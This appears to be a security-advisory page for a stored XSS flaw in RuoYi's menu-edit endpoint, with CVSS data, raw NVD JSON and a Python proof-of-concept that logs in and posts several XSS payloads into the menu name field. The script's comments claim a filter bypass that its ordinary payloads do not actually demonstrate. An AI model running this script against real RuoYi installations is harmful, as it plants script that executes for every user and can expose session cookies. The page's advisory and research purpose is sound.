Security Vulnerability Report
CVE-2025-67342 CVSS 4.6 MEDIUM

CVE-2025-67342

Published: 2025-12-12 17:15:45
Last Modified: 2025-12-19 15:44:55

Description

RuoYi versions 4.8.1 and earlier are affected by a stored XSS vulnerability in the /system/menu/edit endpoint. The endpoint is protected by an XSS filter, but that protection can be bypassed. Because the menu is shared across all users, any user with menu modification permissions can affect every other user by exploiting this stored XSS vulnerability.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ruoyi:ruoyi:*:*:*:*:*:*:*:* - VULNERABLE
RuoYi <= 4.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67342 PoC - Stored XSS in RuoYi /system/menu/edit
# This PoC demonstrates bypassing the XSS filter to inject malicious JavaScript
import requests
import sys

# Configuration
target_url = "http://target-server:80"
login_url = f"{target_url}/login"
menu_edit_url = f"{target_url}/system/menu/edit"

# Login credentials (low-privilege user with menu edit permission)
credentials = {
    "username": "attacker",
    "password": "password123"
}

# XSS Payloads - Bypassing the filter
# Try multiple payloads as the filter may be updated
xss_payloads = [
    # Payload 1: Event handler with encoded characters
    "<img src=x onerror=alert(document.cookie)>",
    # Payload 2: Using SVG element
    "<svg onload=alert('XSS')>",
    # Payload 3: JavaScript URI in anchor
    "<a href='javascript:alert(document.domain)'>Click Me</a>",
    # Payload 4: Body onload event
    "<body onload=alert(String.fromCharCode(88,83,83))>",
    # Payload 5: Input autofocus with onfocus
    "<input onfocus=alert(1) autofocus>"
]


def login(session):
    """Authenticate to RuoYi system"""
    response = session.post(login_url, data=credentials)
    return response.status_code == 200 or "token" in response.text


def exploit(session, payload):
    """Send the XSS payload to menu edit endpoint"""
    # Menu data with XSS payload injected into menuName field
    menu_data = {
        "menuId": 1000,
        "menuName": f"{payload}Normal Menu",
        "orderNum": 1,
        "parentId": 0,
        "path": "/test",
        "component": "Layout",
        "isFrame": "1",
        "isCache": "0",
        "menuType": "M",
        "visible": "0",
        "status": "0",
        "perms": "",
        "icon": "#"
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }
    response = session.post(menu_edit_url, data=menu_data, headers=headers)
    return response.status_code == 200


def main():
    session = requests.Session()
    print("[*] Attempting login...")
    if not login(session):
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Login successful")
    for i, payload in enumerate(xss_payloads, 1):
        print(f"[*] Trying payload {i}: {payload[:50]}...")
        if exploit(session, payload):
            print(f"[+] Payload {i} sent successfully")
            print("[+] Payload stored in menu. Visit /system/menu to trigger XSS")
        else:
            print(f"[-] Payload {i} failed")


if __name__ == "__main__":
    main()
```

References

https://github.com/yangzongzhuan/RuoYi/issues/308 (Exploit, Third Party Advisory, Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67342", "sourceIdentifier": "[email protected]", "published": "2025-12-12T17:15:45.477", "lastModified": "2025-12-19T15:44:54.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RuoYi versions 4.8.1 and earlier is affected by a stored XSS vulnerability in the /system/menu/edit endpoint. While the endpoint is protected by an XSS filter, the protection can be bypassed. Additionally, because the menu is shared across all users, any user with menu modification permissions can impact all users by exploiting this stored XSS vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruoyi:ruoyi:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.8.1", "matchCriteriaId": "900166F8-5C48-4DE0-A6AF-5DB981C0EFCD"}]}]}], "references": [{"url": "https://github.com/yangzongzhuan/RuoYi/issues/308", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}]}}